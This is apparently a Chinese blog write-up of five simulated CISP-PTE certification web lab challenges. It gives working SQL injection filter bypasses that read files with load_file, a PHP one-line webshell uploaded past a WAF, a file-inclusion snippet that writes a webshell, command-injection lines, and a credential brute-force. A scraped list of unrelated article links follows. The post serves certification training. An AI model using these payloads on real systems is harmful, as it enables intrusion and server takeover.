CISP-PTE认证实操模拟题分享
CSIP-PTE安全认证实操题有五道web题,一道综合题,这篇文章只分享5道web题,此靶场为模拟靶场。
SQL注入
通过页面提示,我们要利用sql注入读取/tmp/360/key文件,读取的话就要用到load_file命令来去获取文件信息
通过测试得知,该传值方式为POST方式传值,这里也可以看到返回的sql语句。
输入id=1’) and 1#,发现返回的sql语句过滤了空格。
将空格用/**/代替,值正常返回构造sql语句,查看有多少个显示位,当显示位为5时,则页面不显示数据,所以有4个显示位。
id=1')/**/order/**/by/**/5#
通过联合查询来获取显示位,发现union被过滤
id=-1')/**/union/**/select/**/1,2,3,4#
尝试双写union来绕过
id=-1')/**/ununionion/**/select/**/1,2,3,4#
利用load_file来获取flag值
id=-1')/**/ununionion/**/select/**/1,2,3,load_file('/tmp/360/key')#
文件上传
通过提示得知,需要绕过waf才能上传文件至服务器,flag在/key.php中。
先编写一句话木马,将一句话木马保存在eval.php中
<?php @eval($_POST[shell])?>
通过burp去重放去修改,尝试绕过waf。
将文件后缀名修改成pht,将文件类型修改成image/gif 添加文件头GIF89a,点击发送
可以看到上传成功,利用中国蚁剑连接。
查看key.php文件
文件包含
通过url可以得知是GET传值,可以利用伪协议写入一句话木马
<?php $a = fopen('./1.php','w'); fwrite($a,'<?php eval($_POST[shell])?>'); fclose($a); ?>
连接成功
得到flag
命令执行
在输入框内依次输入’$,$$,|,||,;'看哪些被过滤了
发现都没过滤,我个人喜欢用‘;’,所以下列情况则是通过‘;’来测试。
输入;find / -name "key.php"
找到key.php的路径,那么只需要通过cat去看key.php内容即可
;cat /app/key.php
cat被过滤了,那么用另外的方式去查看该文件
;grep '' /app/key.php
出来了一句话,但没有完全显示
F12查看代码,得到flag
日志分析
通过提示,我们应该重点关注IP为172.16.12.12的操作,将日志文件下载下来,具体分析。
首先筛选出IP,ctrl+f打开查找,输入IP,点击在当前文件中查找
就会得到下列的搜索结果,再将其过滤一遍,只搜索返回值为200的数据。
右键点击在此搜索结果中查找数据
搜索关键字:200
可以看到这里有个疑似是管理后台的url
在浏览器将其打开
利用爆破尝试爆破账号,密码
发现账号:admin 密码:password123页面状态码为302,可能发生跳转
尝试登录,得到flag
CISP-PTE认证实操模拟题分享相关推荐
- Python实操模拟题
实操题 1.Redis数据库操作 阅读下列说明及运行结果, 打开"考生文件夹\10002"文件夹中的素材,阅读代码,在空(1)至(10)处填写正确代码,操作完成后保存素材. 该题是 ...
- 超干货 | 在线教育增长实操者案例分享:如何玩转教育增长模型?
从2012年开始,中国在线教育行业的市场就整体保持着高增长的趋势.随着"校外报课"逐渐成为中国家长的刚需,成人教育机构也一同进入了K12市场.在这场愈发激烈的市场竞争中,在线教育企 ...
- 关于计算机语言的知识正确的是,2019微软认证考试精选模拟题及答案(1.17)
[导语]2019微软认证考试备考正在进行中,为了方便考生及时有效的备考,那么,无忧考网为您精心整理了2019微软认证考试精选模拟题及答案(1.17),把握机会抓紧练习吧.如想获取更多2019微软认证考 ...
- 生产专用计算机管理上必须安装,新版《药品经营质量管理规范》即GSP认证实操问题解答200问...
新版<药品经营质量管理规范>即GSP认证实操 问题解答200问WORD版 新版<药品经营质量管理规范>即GSP认证实操问题解答200问(仅供参考),资料为广东省,资料来源广东省 ...
- 1+X Web前端等级考证 | 2020 12月Web前端开发中级实操 (模拟试题第一套) 附答案
由于经常分享失败,我上传github上了,先放上链接:https://github.com/Lydever/web-1-x.git 请礼貌,不要耍流氓哈哈,创作不易,下载的同时,请start一下,谢谢 ...
- 数据库运维实操优质文章分享(含Oracle、MySQL等) | 2023年3月刊
本文为大家整理了墨天轮数据社区2023年3月发布的优质技术文章,主题涵盖Oracle.MySQL.PostgreSQL等数据库的基础安装配置操作.故障处理.性能优化等日常实践操作,以及概念梳理.常用脚 ...
- 数据库运维实操优质文章分享(含Oracle、MySQL等) | 2023年5月刊
本文为大家整理了墨天轮数据社区2023年5月发布的优质技术文章,主题涵盖Oracle.MySQL.PostgreSQL等数据库的安装配置.故障处理.性能优化等日常实践操作,以及常用脚本.注意事项等总结 ...
- 02-【实操】神策埋点实施的全流程实操与经验分享
大家好,我是罗文正雄 神策的第一篇为<从甲方角度,拆解神策>,后续要讲解实操经验,为提高阅读体验和连贯性,本篇文章将神策的实施,埋点流程,业务赋能实操,原本后3篇的内容,压缩到一篇来讲解, ...
- 如何判断微信定位服务器,如何快速找到自己的微信定位,完成实操作业?分享一下我的思路...
看到群里有很多小伙伴都卡在了微信实操这里,直接导致后续的课程没法再进行下去. 蓝鹅,我在还没有学习到微信课程的时候就在思考公众号要怎么定位,做什么内容! 直到我终于听完了老师关于微信定位的课程后,瞎想 ...
最新文章
- 细说进程、应用程序域与上下文之间的关系(一)——进程的概念与作用
- 5 select 选择的值_表单元素之选择类型
- altium designer显示Analyzing GND,变得很卡
- 下列不属于计算机图形学的应用的是,《数字图形设计》题目与答案3
- 赛题解析 | 初赛赛道一:实现一个分布式统计和过滤的链路追踪
- getchar的利用
- POJ1011 Sticks
- (单层)感知机学习规则
- el-cascader获取label
- Nginx 与 FPM 的工作机制
- Exadata中最有用的功能-存储索引
- JavaScript --------WebS APIs学习之网页特效(动画函数封装)
- 计算机相关论文摘要,计算机类论文摘要
- 蓝牙怎么调声音大小_苹果蓝牙耳机
- 怎么把视频转成mp3音频,下面有四个方法
- 在Mac上开启AptX
- 使用python输出星号阵列
- STM32之数据采集和心率检测仪(原理图、PCB、程序源码等)超详细!!!
- 一站式在线医疗解决方案,即构音视频技术助建互联网医疗
- 干货 | Amos实操教程之中介效应检验
热门文章
- vc_runtimeMinimum_x64.msi 找不到的解决方法microsoft
- Databus for Oracle
- 当代最值得收藏的画家作品_当代最具收藏潜力的实力派画家——徐九龙先生经典作品...
- scrapy爬取途牛网站旅游数据
- [1] 语法课 形容词-副词-情态动词
- 【文档】Decawave-OP-DW1000AoA-Basics
- 硬件大熊原创合集(2022/04更新)
- 香港大学计算机系介绍,香港中文大学计算机专业介绍
- matlab 直流电源突变,鑫诺尔科技:直流电源案例分析及经验分享
- 计算机专业考网警,网络警察都要学什么专业呢?